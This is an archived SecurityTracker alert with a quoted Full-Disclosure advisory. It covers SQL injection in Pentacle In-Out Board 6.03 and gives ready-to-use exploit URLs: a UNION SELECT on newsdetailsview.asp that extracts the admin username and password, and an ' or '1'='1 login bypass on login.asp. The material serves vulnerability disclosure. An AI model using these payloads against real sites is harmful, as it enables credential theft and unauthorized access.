SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Pentacle In-Out Board Vendors:   G2Soft.Net
Pentacle In-Out Board Input Validation Bugs in 'newsdetailsview.asp' and 'login.asp' Permit SQL Injection
SecurityTracker Alert ID:  1015682
SecurityTracker URL:  http://securitytracker.com/id/1015682
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 25 2006
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 6.03
Description:   A vulnerability was reported in Pentacle In-Out Board. A remote user can inject SQL commands. A remote user can bypass authentication.

The 'newsdetailsview.asp' script does not properly validate user-supplied input in the 'newsid' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

A demonstration exploit URL is provided:

http://[target]/[ptdir]/newsdetailsview.asp?newsid=11%20union%20select%200,userpassword,0,username,0,0,0,0
%20from%20pt_users%20where%20userid=1%20and%20useradmin=yes

The 'login.asp' script is also vulnerable. A remote user can exploit this to bypass authentication. A demonstration exploit URL is provided:

http://[site]/[ptdir]/login.asp?username=any&password=' or '1'='1

The vendor was notified on February 25, 2006.

Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI reported this vulnerability.

The original advisories are available at:

http://www.nukedx.com/?viewdoc=13
http://www.nukedx.com/?viewdoc=14

Impact:   A remote user can execute SQL commands on the underlying database. This can be exploited to bypass authentication.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.g2soft.net/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Advisory: Pentacle In-Out Board <= 6.03

--Security Report--
Advisory: Pentacle In-Out Board <= 6.03 (newsdetailsview.asp newsid) Remote SQL
Injection Vulnerability
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 25/02/06 06:08 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: G2SOFT (www.g2soft.net)
Version: 6.03 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL query to
newsdetailsview.asp.
Level: Critical
---
How&Example:
GET -> http://[site]/[ptdir]/newsdetailsview.asp?newsid=11%20[SQLCode]
EXAMPLE ->
http://[site]/[ptdir]/newsdetailsview.asp?newsid=11%20union%20select%200,userpassword,0,username,0,0,0,0
%20from%20pt_users%20where%20userid=1%20and%20useradmin=yes
With this example remote attacker could get admin's username and password.
--
Timeline:
* 25/02/2006: Vulnerability found.
* 25/02/2006: Contacted with vendor and waiting reply.
--
Exploit:
http://www.nukedx.com/?getxpl=14
--
Original advisory: http://www.nukedx.com/?viewdoc=14

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC